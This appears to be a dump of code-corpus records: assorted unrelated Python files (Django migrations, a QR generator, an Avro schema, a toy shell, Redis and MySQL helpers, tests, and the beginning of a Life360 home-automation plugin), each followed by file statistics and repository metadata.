# -*- coding: utf-8 -*- # Generated by Django 1.11.15 on 2018-11-29 23:11 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('posts', '0001_initial'), ] operations = [ migrations.RenameField( model_name='post', old_name='piblished_date', new_name='published_date', ), migrations.RenameField( model_name='post', old_name='view', new_name='views', ), ]
21.653846
49
0.57016
58
563
5.293103
0.655172
0.136808
0.169381
0.19544
0.267101
0.267101
0.267101
0
0
0
0
0.056848
0.312611
563
25
50
22.52
0.736434
0.122558
0
0.333333
1
0
0.126273
0
0
0
0
0
0
1
0
false
0
0.111111
0
0.277778
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
7593f4e87b009e30bfc06b0f207cd76f6db5a110
288
py
Python
QRcodegenerator.py
arpitarunkumaar/Hacktoberfest2021
0af40f90a6c0716caadbbfff44ece947b6146f60
[ "MIT" ]
125
2021-10-01T19:05:26.000Z
2021-10-03T13:32:42.000Z
QRcodegenerator.py
arpitarunkumaar/Hacktoberfest2021
0af40f90a6c0716caadbbfff44ece947b6146f60
[ "MIT" ]
201
2021-10-30T20:40:01.000Z
2022-03-22T17:26:28.000Z
QRcodegenerator.py
arpitarunkumaar/Hacktoberfest2021
0af40f90a6c0716caadbbfff44ece947b6146f60
[ "MIT" ]
294
2021-10-01T18:46:05.000Z
2021-10-03T14:25:07.000Z
import pyqrcode from pyqrcode import QRCode # String which represent the QR code s = "https://www.youtube.com/channel/UCeO9hPCfRzqb2yTuAn713Mg" # Generate QR code url = pyqrcode.create(s) # Create and save the png file naming "myqr.png" url.svg("myyoutube.svg", scale = 8)
24
62
0.725694
41
288
5.097561
0.731707
0.057416
0
0
0
0
0
0
0
0
0
0.025316
0.177083
288
11
63
26.181818
0.85654
0.347222
0
0
1
0
0.377049
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
759e1233cd5221eb7c3d3a4d3d8e9c2c06bf7609
234
py
Python
backend/templatetags/back_tag.py
h1gfun4/h1gfun4.github.io
e460467cb505b525ecd5b01b9eb3fd73de7ec6e1
[ "MIT" ]
null
null
null
backend/templatetags/back_tag.py
h1gfun4/h1gfun4.github.io
e460467cb505b525ecd5b01b9eb3fd73de7ec6e1
[ "MIT" ]
null
null
null
backend/templatetags/back_tag.py
h1gfun4/h1gfun4.github.io
e460467cb505b525ecd5b01b9eb3fd73de7ec6e1
[ "MIT" ]
null
null
null
from django import template from backend.models import Back register = template.Library() @register.inclusion_tag('backend/tags/scrollMenuB.html') def get_back(): scrollB = Back.objects.all() return {"scrollMenuB": scrollB }
26
56
0.75641
29
234
6.034483
0.689655
0
0
0
0
0
0
0
0
0
0
0
0.128205
234
9
57
26
0.857843
0
0
0
0
0
0.170213
0.123404
0
0
0
0
0
1
0.142857
false
0
0.285714
0
0.571429
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
75c58beec52cc06cb6843a182d38d84b973164ec
1,358
py
Python
serializers_test/avro_avg.py
lioritan/Side-Projects
647bdbf0d3b71ea113739fb7ad2b299aea28c653
[ "MIT" ]
null
null
null
serializers_test/avro_avg.py
lioritan/Side-Projects
647bdbf0d3b71ea113739fb7ad2b299aea28c653
[ "MIT" ]
null
null
null
serializers_test/avro_avg.py
lioritan/Side-Projects
647bdbf0d3b71ea113739fb7ad2b299aea28c653
[ "MIT" ]
null
null
null
import avro.schema import json import fastavro SCHEMA = { "namespace": "avg_obj", "type": "record", "name": "Meme", "fields": [ {"name": "user", "type": { "type": "record", "name": "PostUser", "fields": [ {"name": "user_id", "type": "string"}, {"name": "first_name", "type": ["null", "string"], "default": "null"}, {"name": "last_name", "type": ["null", "string"], "default": "null"}, {"name": "user_type", "type": ["null", {"type": "enum", "name": "UserType", "symbols": ["FREE", "REGULAR", "PREMIUM"] }], "default": "null"}, ]}}, {"name": "title", "type": ["null", "string"], "default": "null"}, {"name": "content", "type": ["null", "bytes"], "default": "null"}, {"name": "top_string", "type": ["null", "string"], "default": "null"}, {"name": "botom_string", "type": ["null", "string"], "default": "null"}, {"name": "likes", "type": ["null", "long"], "default": 0}, {"name": "hates", "type": ["null", "long"], "default": 0}, ] } avro_schema = fastavro.parse_schema(SCHEMA)
38.8
89
0.401325
110
1,358
4.872727
0.336364
0.134328
0.195896
0.195896
0.382463
0.307836
0.253731
0
0
0
0
0.002307
0.361561
1,358
34
90
39.941176
0.615917
0
0
0.133333
0
0
0.338733
0
0
0
0
0
0
1
0
false
0
0.1
0
0.1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
75caae991e7575297539a0a5755bf9b4493ee335
3,258
py
Python
pysh.py
tri-llionaire/tri-llionaire.github.io
5134d3ec0ff1e3b7eab469ea05300b505895212f
[ "MIT" ]
1
2018-04-24T14:53:23.000Z
2018-04-24T14:53:23.000Z
pysh.py
tri-llionaire/tri-llionaire.github.io
5134d3ec0ff1e3b7eab469ea05300b505895212f
[ "MIT" ]
null
null
null
pysh.py
tri-llionaire/tri-llionaire.github.io
5134d3ec0ff1e3b7eab469ea05300b505895212f
[ "MIT" ]
1
2018-08-25T21:15:07.000Z
2018-08-25T21:15:07.000Z
#pysh: shell in python import sys cmdlist = ['start','exit','cd','md','ls','pd','cf','cl'] convert = [] waiting = 0 print 'pysh 1.0.5 19.03.11 #6. type start to enter, exit to leave.' paths = ['pysh/'] direct = 'pysh/' added = [] entered = raw_input(': ') if entered == 'start': while entered != ['exit']: entered = raw_input('{} '.format(direct)) entered = entered.split() for x in entered: if x in cmdlist: if waiting == 0: if x == 'ls': for i in paths: if i.startswith(direct) and len(i) > len(direct): temp = len(direct) splitted = i[temp:].split('/') if len(splitted) > 1 and (splitted[0] + '/') not in added: print splitted[0] + '/' added.append(splitted[0] + '/') elif len(splitted) < 2 and splitted[0] not in added: print splitted[0] added.append(splitted[0]) else: pass else: pass elif x == 'pd': print direct elif x == 'cd': waiting = 1 elif x == 'md': waiting = 2 elif x == 'cf': waiting = 3 elif x == 'start': print 'already in pysh' elif x == 'cl': sys.stdout.write('\x1b[2J\x1b[H') else: break else: print 'pysh: consecutive cmd {}'.format(x) else: if waiting == 1: if x == '..': direct = direct[:-1].rsplit('/',1)[0] + '/' else: if direct + x + '/' in paths: direct = direct + x + '/' elif x.endswith('/'): if direct + x in paths: direct = direct + x else: print 'pysh: directory \'{}\' not found'.format(x) else: print 'pysh: can\'t cd to file \'{}\''.format(x) waiting = 0 elif waiting == 2: if x.endswith('/'): paths.append(direct + x) else: paths.append(direct + x + '/') waiting = 0 elif waiting == 3: if x.endswith('/'): paths.append(direct + x - '/') else: paths.append(direct + x) waiting = 0 else: print 'pysh: {} not found.'.format(x) break else: print 'startup: {} not found'.format(entered)
40.222222
90
0.329343
275
3,258
3.894545
0.258182
0.052288
0.048553
0.067227
0.297852
0.268908
0.268908
0.268908
0.214753
0.214753
0
0.024322
0.558318
3,258
80
91
40.725
0.719944
0.006446
0
0.303797
0
0.012658
0.082818
0
0
0
0
0
0
0
null
null
0.025316
0.012658
null
null
0.126582
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
f9557c2acc79de6411f64feb5d4d5550266b917c
992
py
Python
release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py
YKato521/ironpython-stubs
b1f7c580de48528490b3ee5791b04898be95a9ae
[ "MIT" ]
null
null
null
release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py
YKato521/ironpython-stubs
b1f7c580de48528490b3ee5791b04898be95a9ae
[ "MIT" ]
null
null
null
release/stubs.min/System/Diagnostics/__init___parts/EventLogPermissionEntry.py
YKato521/ironpython-stubs
b1f7c580de48528490b3ee5791b04898be95a9ae
[ "MIT" ]
null
null
null
class EventLogPermissionEntry(object): """ Defines the smallest unit of a code access security permission that is set for an System.Diagnostics.EventLog. EventLogPermissionEntry(permissionAccess: EventLogPermissionAccess,machineName: str) """ @staticmethod def __new__(self, permissionAccess, machineName): """ __new__(cls: type,permissionAccess: EventLogPermissionAccess,machineName: str) """ pass MachineName = property( lambda self: object(), lambda self, v: None, lambda self: None ) """Gets the name of the computer on which to read or write events. Get: MachineName(self: EventLogPermissionEntry) -> str """ PermissionAccess = property( lambda self: object(), lambda self, v: None, lambda self: None ) """Gets the permission access levels used in the permissions request. Get: PermissionAccess(self: EventLogPermissionEntry) -> EventLogPermissionAccess """
24.8
112
0.686492
97
992
6.938144
0.536082
0.089153
0.15156
0.160475
0.178306
0.178306
0.178306
0.178306
0.178306
0.178306
0
0
0.228831
992
39
113
25.435897
0.879739
0.279234
0
0.2
0
0
0
0
0
0
0
0
0
1
0.1
false
0.1
0
0
0.4
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
f9564d9454e04c5d07bedcb3655d9efe0ca449c7
133
py
Python
compound_types/built_ins/lists.py
vahndi/compound-types
cda4f49651b4bfbcd9fe199de276be472620cfad
[ "MIT" ]
null
null
null
compound_types/built_ins/lists.py
vahndi/compound-types
cda4f49651b4bfbcd9fe199de276be472620cfad
[ "MIT" ]
null
null
null
compound_types/built_ins/lists.py
vahndi/compound-types
cda4f49651b4bfbcd9fe199de276be472620cfad
[ "MIT" ]
null
null
null
from typing import List BoolList = List[bool] DictList = List[dict] FloatList = List[float] IntList = List[int] StrList = List[str]
16.625
23
0.736842
19
133
5.157895
0.736842
0
0
0
0
0
0
0
0
0
0
0
0.150376
133
7
24
19
0.867257
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f95b8e23ac103c21bff72619bd1a14be401e08f2
161
py
Python
alexa_skill_boilerplate/__init__.py
variable/alexa_skill_boilerplate
c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc
[ "MIT" ]
null
null
null
alexa_skill_boilerplate/__init__.py
variable/alexa_skill_boilerplate
c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc
[ "MIT" ]
null
null
null
alexa_skill_boilerplate/__init__.py
variable/alexa_skill_boilerplate
c2c7fc2a3fe8f0bc69ec7559ec9b11f211d76bdc
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """Top-level package for Alexa Skill Boilerplate.""" __author__ = """James Lin""" __email__ = 'james@lin.net.nz' __version__ = '0.1.0'
20.125
52
0.639752
22
161
4.136364
0.863636
0.175824
0
0
0
0
0
0
0
0
0
0.028986
0.142857
161
7
53
23
0.630435
0.428571
0
0
0
0
0.348837
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f9873b3ec6305739faa020963cb0f6929823dc6d
799
py
Python
e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py
zhouli121018/nodejsgm
0ccbc8acf61badc812f684dd39253d55c99f08eb
[ "MIT" ]
null
null
null
e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py
zhouli121018/nodejsgm
0ccbc8acf61badc812f684dd39253d55c99f08eb
[ "MIT" ]
18
2020-06-05T18:17:40.000Z
2022-03-11T23:25:21.000Z
e/mail-relay/web/apps/core/migrations/0051_customersetting_transfer_max_size.py
zhouli121018/nodejsgm
0ccbc8acf61badc812f684dd39253d55c99f08eb
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('core', '0050_customersetting_can_view_mail'), ] operations = [ migrations.AddField( model_name='customersetting', name='transfer_max_size', field=models.IntegerField(default=0, help_text='\u5355\u4f4d\uff1aM\uff0c\u90ae\u4ef6\u5927\u5c0f\u8d85\u8fc7\u8be5\u9600\u503c\uff0c\u5219\u8be5\u90ae\u4ef6\u53d1\u9001\u65f6\u81ea\u52a8\u8f6c\u7f51\u7edc\u9644\u4ef6, \u9ed8\u8ba4\u503c\uff10, \u8868\u793a\u7528\u7cfb\u7edf\u9ed8\u8ba4\u8bbe\u7f6e\u503c', verbose_name='\u4e2d\u7ee7\uff1a\u81ea\u52a8\u8f6c\u7f51\u7edc\u9644\u4ef6\u6700\u5927\u9600\u503c'), ), ]
39.95
421
0.713392
100
799
5.56
0.72
0.035971
0.053957
0.071942
0.125899
0.125899
0.125899
0
0
0
0
0.212299
0.145181
799
19
422
42.052632
0.601757
0.026283
0
0
0
0.153846
0.529639
0.48067
0
0
0
0
0
1
0
false
0
0.153846
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f98d78abc4c61ae00ffd3cee5b5299a82b124239
505
py
Python
umysqldb/__init__.py
arozumenko/pyumysql
34b61faf33e2db644b02c483c07ddca32165539a
[ "Apache-2.0" ]
null
null
null
umysqldb/__init__.py
arozumenko/pyumysql
34b61faf33e2db644b02c483c07ddca32165539a
[ "Apache-2.0" ]
null
null
null
umysqldb/__init__.py
arozumenko/pyumysql
34b61faf33e2db644b02c483c07ddca32165539a
[ "Apache-2.0" ]
null
null
null
from umysqldb import connections from umysqldb import cursors def connect(db, host="localhost", port=3306, user="root", passwd="root", charset="utf8", cursorclass=cursors.Cursor, autocommit=False): return connections.Connection(database=db, host=host, port=port, user=user, passwd=passwd, charset=charset, cursorclass=cursorclass, autocommit=autocommit) Connection = Connect = connect
42.083333
79
0.609901
48
505
6.416667
0.5
0.077922
0.116883
0
0
0
0
0
0
0
0
0.014124
0.29901
505
12
80
42.083333
0.855932
0
0
0
0
0
0.041502
0
0
0
0
0
0
1
0.111111
false
0.222222
0.222222
0.111111
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
1
0
0
0
2
f9a2fdd3c94e96ddac9d38ba04e226d5f50ff29b
452
py
Python
docker/dev_app/views.py
uw-it-aca/uw-django-saml2
04cd99c0f8fff6160c13e3aa0e44324f6a4079fe
[ "Apache-2.0" ]
2
2018-04-20T19:02:11.000Z
2020-01-21T07:08:48.000Z
docker/dev_app/views.py
uw-it-aca/uw-django-saml2
04cd99c0f8fff6160c13e3aa0e44324f6a4079fe
[ "Apache-2.0" ]
71
2018-03-27T17:52:31.000Z
2022-02-18T23:09:05.000Z
docker/dev_app/views.py
uw-it-aca/uw-django-saml2
04cd99c0f8fff6160c13e3aa0e44324f6a4079fe
[ "Apache-2.0" ]
1
2018-12-04T19:20:36.000Z
2018-12-04T19:20:36.000Z
from django.conf import settings from django.contrib.auth.decorators import login_required from django.http import HttpResponse from uw_saml.utils import is_member_of_group # Create your views here. @login_required def index(request): if is_member_of_group(request, settings.UW_SAML_PERMISSIONS['perm2']): return HttpResponse("Hello, world. You have perm2.") else: return HttpResponse("Hello, world. You don't have perm2.")
28.25
74
0.765487
64
452
5.234375
0.578125
0.089552
0.059701
0.089552
0.185075
0
0
0
0
0
0
0.007833
0.152655
452
15
75
30.133333
0.866841
0.050885
0
0
0
0
0.161593
0
0
0
0
0
0
1
0.1
false
0
0.4
0
0.7
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
f9ade94d5d26429d7edd4cdfcee8f28919e4bd4f
597
py
Python
ror/NoTieResolver.py
jakub-tomczak/ror
cf9ab38a2d66f4816a1289b9726911960059fce7
[ "MIT" ]
null
null
null
ror/NoTieResolver.py
jakub-tomczak/ror
cf9ab38a2d66f4816a1289b9726911960059fce7
[ "MIT" ]
null
null
null
ror/NoTieResolver.py
jakub-tomczak/ror
cf9ab38a2d66f4816a1289b9726911960059fce7
[ "MIT" ]
null
null
null
from ror.RORParameters import RORParameters from ror.RORResult import RORResult from ror.AbstractTieResolver import AbstractTieResolver from ror.result_aggregator_utils import Rank class NoTieResolver(AbstractTieResolver): def __init__(self) -> None: super().__init__('NoResolver') def resolve_rank(self, rank: Rank, result: RORResult, parameters: RORParameters) -> Rank: super().resolve_rank(rank, result, parameters) return rank def help(self) -> str: return 'This resolver does nothing. It just returns same rank as was provided as an input.'
37.3125
99
0.740369
71
597
6.056338
0.507042
0.065116
0.065116
0
0
0
0
0
0
0
0
0
0.18258
597
16
99
37.3125
0.881148
0
0
0
0
0
0.153846
0
0
0
0
0
0
1
0.25
false
0
0.333333
0.083333
0.833333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
0
0
0
2
f9b1deee9145e20a82bd34752d2e98a230a5a620
568
py
Python
src/database/migrations/0027_auto_20190829_1530.py
gregory-chekler/api
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
[ "MIT" ]
2
2020-07-24T12:58:17.000Z
2020-12-17T02:26:13.000Z
src/database/migrations/0027_auto_20190829_1530.py
gregory-chekler/api
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
[ "MIT" ]
214
2019-06-26T17:33:54.000Z
2022-03-26T00:02:34.000Z
src/database/migrations/0027_auto_20190829_1530.py
massenergize/portalBackEnd
7ed971b2be13901667a216d8c8a46f0bed6d6ccd
[ "MIT" ]
6
2020-03-13T20:29:06.000Z
2021-08-20T16:15:08.000Z
# Generated by Django 2.2.3 on 2019-08-29 15:30 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('database', '0026_auto_20190829_1528'), ] operations = [ migrations.AddField( model_name='vendor', name='email', field=models.EmailField(blank=True, max_length=100), ), migrations.AddField( model_name='vendor', name='phone_number', field=models.CharField(blank=True, max_length=100), ), ]
23.666667
64
0.584507
60
568
5.4
0.666667
0.111111
0.141975
0.166667
0.358025
0.228395
0
0
0
0
0
0.092965
0.299296
568
23
65
24.695652
0.721106
0.079225
0
0.352941
1
0
0.115163
0.044146
0
0
0
0
0
1
0
false
0
0.058824
0
0.235294
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
f9b5c8efc58630f49b1fe78511366116237e9554
471
py
Python
tests/conditions/operators/test_set_membership_operator.py
rusintez/flipper-client
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
[ "Apache-2.0" ]
82
2019-04-03T16:09:04.000Z
2022-03-29T23:48:31.000Z
tests/conditions/operators/test_set_membership_operator.py
rusintez/flipper-client
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
[ "Apache-2.0" ]
17
2019-04-16T17:17:36.000Z
2021-02-25T22:06:01.000Z
tests/conditions/operators/test_set_membership_operator.py
rusintez/flipper-client
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
[ "Apache-2.0" ]
12
2019-07-29T20:07:28.000Z
2022-03-29T21:10:15.000Z
import unittest from flipper.conditions.operators.set_membership_operator import SetMembershipOperator class TestCompare(unittest.TestCase): def test_returns_true_when_expected_is_in_actual(self): operator = SetMembershipOperator() self.assertTrue(operator.compare(1, [1, 2, 3])) def test_returns_false_when_expected_is_not_in_actual(self): operator = SetMembershipOperator() self.assertFalse(operator.compare(1, [2, 3, 4]))
29.4375
86
0.760085
56
471
6.089286
0.571429
0.041056
0.082111
0.117302
0.26393
0.26393
0
0
0
0
0
0.02005
0.152866
471
15
87
31.4
0.834586
0
0
0.222222
0
0
0
0
0
0
0
0
0.222222
1
0.222222
false
0
0.222222
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
f9b8816aef7a829b307e2a9d13b933fbcd80a3a1
353
py
Python
tests/utils/test_gzipgen.py
takanabe/cli
7cbf781d7f286fc4e52ef0980712c28f386e8d09
[ "Apache-2.0" ]
19
2021-01-07T06:41:51.000Z
2022-03-05T08:23:57.000Z
tests/utils/test_gzipgen.py
takanabe/cli
7cbf781d7f286fc4e52ef0980712c28f386e8d09
[ "Apache-2.0" ]
189
2020-11-04T15:38:47.000Z
2022-03-31T05:02:06.000Z
tests/utils/test_gzipgen.py
takanabe/cli
7cbf781d7f286fc4e52ef0980712c28f386e8d09
[ "Apache-2.0" ]
7
2020-11-20T16:55:51.000Z
2022-02-01T11:17:30.000Z
from launchable.utils.gzipgen import compress import gzip from unittest import TestCase class GzippenTest(TestCase): def test_compress(self): """Basic sanity test of """ encoded = b''.join(compress([b'Hello', b' ', b'world'])) msg = gzip.decompress(encoded) print(msg) self.assertEqual(msg, b'Hello world')
27.153846
64
0.654391
44
353
5.227273
0.590909
0.052174
0
0
0
0
0
0
0
0
0
0
0.220963
353
12
65
29.416667
0.836364
0.056657
0
0
0
0
0.067485
0
0
0
0
0
0.111111
1
0.111111
false
0
0.333333
0
0.555556
0.111111
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
f9e18afe3ddb7b565b697f03187cc311b80b604e
670
py
Python
dallinger/redis_utils.py
Dallinger/Dallinger
c3acf1375391ef8cb702641638bf5a5008aa9be3
[ "MIT" ]
100
2016-09-07T03:55:36.000Z
2022-02-28T02:20:10.000Z
dallinger/redis_utils.py
Dallinger/Dallinger
c3acf1375391ef8cb702641638bf5a5008aa9be3
[ "MIT" ]
3,457
2016-09-05T23:21:31.000Z
2022-03-31T19:11:31.000Z
dallinger/redis_utils.py
Dallinger/Dallinger
c3acf1375391ef8cb702641638bf5a5008aa9be3
[ "MIT" ]
53
2016-10-03T07:24:34.000Z
2021-10-20T20:42:38.000Z
import os import redis from urllib.parse import urlparse def connect_to_redis(url=None): """Return a connection to Redis. If a URL is supplied, it will be used, otherwise an environment variable is checked before falling back to a default. Since we are generally running on Heroku, and configuring SSL certificates is challenging, we disable cert requirements on secure connections. """ redis_url = url or os.getenv("REDIS_URL", "redis://localhost:6379") connection_args = {"url": redis_url} if urlparse(redis_url).scheme == "rediss": connection_args["ssl_cert_reqs"] = None return redis.from_url(**connection_args)
30.454545
78
0.723881
95
670
4.978947
0.589474
0.084567
0
0
0
0
0
0
0
0
0
0.007407
0.19403
670
21
79
31.904762
0.868519
0.435821
0
0
0
0
0.150997
0.062678
0
0
0
0
0
1
0.111111
false
0
0.333333
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
ddabee57641e5f2212bdb1af4233c76d2dc9db3e
2,238
py
Python
introspection/call_stack.py
Aran-Fey/introspection
0ce3a16688b51bdcb72c7b070d571a1004f5151b
[ "MIT" ]
1
2022-03-02T23:13:06.000Z
2022-03-02T23:13:06.000Z
introspection/call_stack.py
Aran-Fey/introspection
0ce3a16688b51bdcb72c7b070d571a1004f5151b
[ "MIT" ]
null
null
null
introspection/call_stack.py
Aran-Fey/introspection
0ce3a16688b51bdcb72c7b070d571a1004f5151b
[ "MIT" ]
null
null
null
import types from typing import Iterable, Union from .call_frame import CallFrame __all__ = ['CallStack'] class CallStack: """ Represents the call stack - a series of :class:`CallFrame` instances. This class can be used like a read-only list. It supports iteration, indexing, membership testing, etc. The root frame is first in the list, at index 0. Because holding references to call frames can result in reference cycles, it's recommended to use CallStack objects as context managers. Upon exit, the frame objects are released and the CallStack becomes empty:: with CallStack.current() as stack: ... # do something with the stack # at this point, len(stack) is 0 """ __slots__ = ('__frames',) def __init__(self, frames: Iterable[Union[CallFrame, types.FrameType]]): """ Creates a new ``CallStack`` from the given frame objects. :param frames: An iterable of frame objects, starting with the root frame """ self.__frames = [CallFrame.from_frame(frame) for frame in frames] @classmethod def current(cls) -> 'CallStack': """ Get the current call stack. """ with CallFrame.current() as frame: return cls.from_frame(frame.parent) @classmethod def from_frame(cls, frame) -> 'CallStack': """ Creates a ``CallStack`` containing ``frame`` and all its parents. :param frame: The last frame in the call stack :return: A new ``CallStack`` instance """ frames = [frame] while True: frame = frame.f_back if frame is None: break frames.append(frame) frames.reverse() return cls(frames) def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.__frames.clear() def __iter__(self): return iter(self.__frames) def __reversed__(self): return reversed(self.__frames) def __getitem__(self, index): return self.__frames[index] def __len__(self): return len(self.__frames) def __contains__(self, frame): return frame in self.__frames
26.963855
156
0.626005
273
2,238
4.897436
0.40293
0.059835
0.02917
0
0
0
0
0
0
0
0
0.001252
0.28597
2,238
82
157
27.292683
0.835419
0.38874
0
0.055556
0
0
0.028455
0
0
0
0
0
0
1
0.277778
false
0
0.083333
0.166667
0.638889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
ddb85f6c9f54c6a26a73cc1b1e07e1f705ce4e40
124
py
Python
test_suite/suite/test09/other_mod.py
joncatanio/cannoli
410f6bea362bf9e33eecc0e01fb080dadd14ef23
[ "MIT" ]
755
2017-12-09T05:34:43.000Z
2022-03-26T09:15:56.000Z
test_suite/suite/test09/other_mod.py
joncatanio/cannoli
410f6bea362bf9e33eecc0e01fb080dadd14ef23
[ "MIT" ]
8
2017-12-12T01:03:18.000Z
2020-06-29T01:41:03.000Z
test_suite/suite/test09/other_mod.py
joncatanio/cannoli
410f6bea362bf9e33eecc0e01fb080dadd14ef23
[ "MIT" ]
23
2018-05-17T17:48:23.000Z
2022-03-26T09:15:57.000Z
import some_mod def functione(b): a = some_mod.some_class() print(b) print("othermod calling in " + str(a.hello))
17.714286
47
0.669355
20
124
4
0.7
0.175
0
0
0
0
0
0
0
0
0
0
0.193548
124
6
48
20.666667
0.8
0
0
0
0
0
0.16129
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0.4
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
ddc39e71f4d5f6b6a53e16b07decfbb4b7887488
12,963
py
Python
life360.indigoPlugin/Contents/Server Plugin/plugin.py
ryanbuckner/life360-plugin
3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe
[ "MIT" ]
1
2021-09-25T15:43:00.000Z
2021-09-25T15:43:00.000Z
life360.indigoPlugin/Contents/Server Plugin/plugin.py
ryanbuckner/life360-plugin
3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe
[ "MIT" ]
null
null
null
life360.indigoPlugin/Contents/Server Plugin/plugin.py
ryanbuckner/life360-plugin
3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe
[ "MIT" ]
null
null
null
#! /usr/bin/env python # -*- coding: utf-8 -*- #################### # Copyright (c) 2021 ryanbuckner # https://github.com/ryanbuckner/life360-plugin/wiki # # Based on neilk's Solcast plugin ################################################################################ # Imports ################################################################################ import indigo import sys from life360 import life360 import datetime try: from geopy.geocoders import Nominatim except: self.logger.debug("Geopy python library is not found. Try reinstalling the Plugin") pass ################################################################################ # Globals ################################################################################ ################################################################################ class Plugin(indigo.PluginBase): ######################################## # Class properties ######################################## ######################################## def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs): super(Plugin, self).__init__(pluginId, pluginDisplayName, pluginVersion, pluginPrefs) self.debug = pluginPrefs.get("showDebugInfo", False) self.deviceList = [] try: self.authorization_token = self.pluginPrefs.get('authorizationtoken', 'cFJFcXVnYWJSZXRyZTRFc3RldGhlcnVmcmVQdW1hbUV4dWNyRUh1YzptM2ZydXBSZXRSZXN3ZXJFQ2hBUHJFOTZxYWtFZHI0Vg') self.username = self.pluginPrefs.get('life360_username', None) self.password = self.pluginPrefs.get('life360_password', None) self.refresh_frequency = self.pluginPrefs.get('refresh_frequency', 30) self.logger.debug("Success retriving preferences from Plugin config") except: self.logger.error("Error retrieving Plugin preferences. Please use Configure to set") self.logger.info(u"") self.logger.info(u"{0:=^130}".format("Starting Life360 Plugin Engine")) self.logger.info(u"{0:<30} {1}".format("Plugin name:", pluginDisplayName)) self.logger.info(u"{0:<30} {1}".format("Plugin version:", pluginVersion)) self.logger.info(u"{0:<30} {1}".format("Plugin ID:", pluginId)) self.logger.info(u"{0:<30} {1}".format("Refresh Frequency:", str(self.refresh_frequency) + " seconds")) self.logger.info(u"{0:<30} {1}".format("Indigo version:", indigo.server.version)) self.logger.info(u"{0:<30} {1}".format("Python version:", sys.version.replace('\n', ''))) self.logger.info(u"{0:<30} {1}".format("Python Directory:", sys.prefix.replace('\n', ''))) self.logger.info(u"{0:=^130}".format("")) self.life360data = {} self.member_list = {} ######################################## def deviceStartComm(self, device): self.logger.debug("Starting device: " + device.name) device.stateListOrDisplayStateIdChanged() if device.id not in self.deviceList: self.update(device) self.deviceList.append(device.id) ######################################## 